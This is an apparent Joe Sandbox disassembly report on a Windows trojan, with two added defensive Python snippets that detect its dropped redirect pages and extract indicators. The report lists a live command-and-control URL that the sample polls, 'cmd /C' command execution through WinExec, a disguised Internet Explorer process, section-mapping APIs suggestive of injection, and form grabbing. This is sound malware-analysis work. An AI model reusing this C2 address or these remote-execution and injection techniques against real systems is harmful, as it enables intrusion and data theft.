                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
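Added example, not part of the Joe Sandbox report and not the sample's own code: read in order, the strcat/sprintf sequence listed for 0040570C gives the exact layout of the .htm file the sample writes under the GetTempPathA directory (note the final fragment is "</body><html>", not "</html>", a quirk that distinguishes these files from real pages). The Python below rebuilds that layout as a regular expression, recognises a dropped page and pulls out the redirect target and the setTimeout delay; it also matches the window title that 004053D4 and 00405DCA format as "%s%u - Microsoft Internet Explorer" with "MicroSoft-Corp", which the FindWindowA("IEFrame") / GetWindowTextA loop later searches for. Assumptions: the three unresolved constants (0042CC6C, inserted after rand() checks, and 0042CA2E / 0042CA14 around the location assignment) are short filler, so up to eight arbitrary characters are tolerated between fragments; the sample page, its random numbers and its URL are constructed.

```python
import re

# Added example (not from the report or the sample). Fragments of the dropped
# .htm page in the order 0040570C emits them. "%u" stands for a rand() value,
# "%s" for the redirect target. The three unresolved constants (0042CC6C,
# 0042CA2E, 0042CA14) are ASSUMED to be short filler and are not listed.
TEMPLATE = [
    "<html>", "<!-- %u -->", "<head>", "<!-- %u -->",
    "<title>MicroSoft-Corp%u</title>", "</head>", "<body>", "<!-- %u -->",
    "<script>", "function x()", 'self.parent.location="%s";',
    'setTimeout("x()",%u);', "</script>", "<!-- %u -->", "</body><html>",
]

# ASSUMPTION: at most 8 filler characters appear between two fragments.
FILLER = r"[\s\S]{0,8}?"


def fragment_to_regex(frag):
    """Escape one literal fragment, turning %u into a digit group and %s into
    a quoted-string group."""
    out = []
    for piece in re.split(r"(%u|%s)", frag):
        if piece == "%u":
            out.append(r"(\d+)")
        elif piece == "%s":
            out.append(r'([^"]*)')
        else:
            out.append(re.escape(piece))
    return "".join(out)


PAGE_RE = re.compile(r"\A\s*" + FILLER.join(map(fragment_to_regex, TEMPLATE)) + r"\s*\Z")

# Title that 004053D4 / 00405DCA give the spawned Iexplore.exe window and that
# the FindWindowA("IEFrame") / GetWindowTextA loop later looks for.
IE_TITLE_RE = re.compile(r"\AMicroSoft-Corp(\d+) - Microsoft Internet Explorer\Z")


def match_dropped_page(text):
    """Return title, redirect target, setTimeout delay and the four random
    comment values if `text` has the generated layout, else None."""
    m = PAGE_RE.match(text)
    if m is None:
        return None
    g = m.groups()  # (comment, comment, title counter, comment, url, delay, comment)
    return {
        "title": "MicroSoft-Corp" + g[2],
        "redirect": g[4],
        "delay_ms": int(g[5]),
        "rand_comments": [int(g[i]) for i in (0, 1, 3, 6)],
    }


def is_hijacked_ie_title(title):
    """True for the title the sample assigns to its own Iexplore.exe instance."""
    return IE_TITLE_RE.match(title) is not None


# Constructed sample of a dropped page; the numbers and the URL are made up.
SAMPLE_HTM = (
    '<html>\n<!-- 41 --><head>\n<!-- 18467 --><title>MicroSoft-Corp6334</title>'
    '</head><body><!-- 26500 --><script>function x()\n{self.parent.location='
    '"http://example.invalid/wcmd.htm";}\nsetTimeout("x()",19169);</script>'
    '<!-- 15724 --></body><html>'
)

if __name__ == "__main__":
    print(match_dropped_page(SAMPLE_HTM))
    print(is_hijacked_ie_title("MicroSoft-Corp6334 - Microsoft Internet Explorer"))
```

To sweep a host, run match_dropped_page over every *.htm in the user's temp directory; the random comment values and filler mean a plain string or hash match will not work, which is why the check is structural.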

                            Control-flow Graph

(Control-flow graph image not rendered in this export. Recoverable structure from the graph data: entry 004068B0-004068C1; loop head 004068C7-004068E1 calls 00405F5B; 004068E7-0040690F calls 00403619; 00406941-00406970 sscanf; 00406972-00406995 rand; either 004069A4-004069D9 (sprintf x2, cmd.pif / cmd.exe) or 004069DB-00406A24 (GetWindowsDirectoryA, sprintf, strcat, command.pif / command.com); 00406A27-00406A61 DeleteFileA, sprintf, WinExec; 00406A66-00406A7E calls 0040143B; 00406A84-00406AA7 atoi; 00406AAD-00406AEF sprintf, 00407A04, lstrlenA; 00406B20-00406BDC sprintf, lstrlenA x2, LocalAlloc, 00407A04, lstrlenA, 00407A04, CreateThread, CloseHandle; 00406BE1-00406BFB calls 004043BF; 00406C01-00406C07 LocalFree; 00406C0C-00406C1D _sleep. Every path returns through the _sleep block to 004068C7, so the function is an endless polling loop.)
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
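Added example, our own parser and not Joe Sandbox tooling: the per-call lines above share one shape, "api.MODULE(args), ref: address", so the indicators in a function like 004068B0 can be scripted out of the report instead of copied by hand. The Python below parses a copy of the call lines from that function, separates literal strings from stack-slot placeholders ("?", 8-hex-digit values, Function_XXXXXXXX), buckets the literals into the C2 URL, the file-name templates and the command template, records the API order, and converts the _sleep argument 001B7740 to seconds (1800, i.e. a 30-minute poll interval). Caveats: the argument columns are stack slots at call time, so a literal from an earlier call recurs in later lines (the URL shows up in lstrlenA and sprintf) and results are deduplicated; arguments are split on commas, so a literal containing a comma (the setTimeout format string in 0040570C) would be split; "Part of subcall function" lines are skipped.

```python
import re

# Added example (our parser, not Joe Sandbox tooling). Call lines copied from the
# listing for function 004068B0; "Part of subcall" lines are omitted on purpose.
REPORT_LINES = r"""
• sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
• rand.CRTDLL ref: 00406972
• sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
• sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
• GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
• sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
• strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
• DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
• sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
• WinExec.KERNEL32(?,00000000), ref: 00406A61
• atoi.CRTDLL(00000035), ref: 00406A8E
• sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
• lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
• sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
• CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
• _sleep.CRTDLL(001B7740), ref: 00406C17
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)"       # e.g. sprintf.CRTDLL
    r"(?:\((?P<args>.*)\))?"                    # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"  # call-site address
)
# Stack slots the report could not resolve to a string: "?", raw 8-hex-digit
# values (optionally negative) and internal function references.
PLACEHOLDER = re.compile(r"^(-?[0-9A-Fa-f]{8}|\?|Function_[0-9A-Fa-f]{8})$")


def parse_call(line):
    """Parse one call line into api/module/ref, raw args and literal strings.
    Returns None for lines that are not call lines (headers, subcall lines)."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    args = raw.split(",") if raw else []  # caveat: splits literals containing commas
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "ref": m.group("ref").upper(),
        "args": args,
        "strings": [a for a in args if not PLACEHOLDER.match(a)],
    }


def extract_iocs(report_text):
    """Bucket the literal strings of all call lines into indicator classes."""
    iocs = {"urls": set(), "commands": set(), "file_templates": set(),
            "sleep_seconds": [], "call_sequence": []}
    for line in report_text.splitlines():
        rec = parse_call(line)
        if rec is None:
            continue
        iocs["call_sequence"].append(rec["api"])
        for s in rec["strings"]:
            if s.startswith(("http://", "https://")):
                iocs["urls"].add(s)
            elif " /C " in s:                    # cmd.exe /C <command> template
                iocs["commands"].add(s)
            elif "\\" in s or "/" in s:          # path or file-name template
                iocs["file_templates"].add(s)
        # Sleep / _sleep take milliseconds; the report prints them in hex.
        if rec["api"] in ("_sleep", "Sleep") and rec["args"]:
            iocs["sleep_seconds"].append(int(rec["args"][0], 16) / 1000)
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(REPORT_LINES).items():
        print(key, value)
```

The same parser runs over any other function listing on this page; only the bucketing heuristics (URL prefix, " /C ", path separators) are specific to what 004068B0 contains.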
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
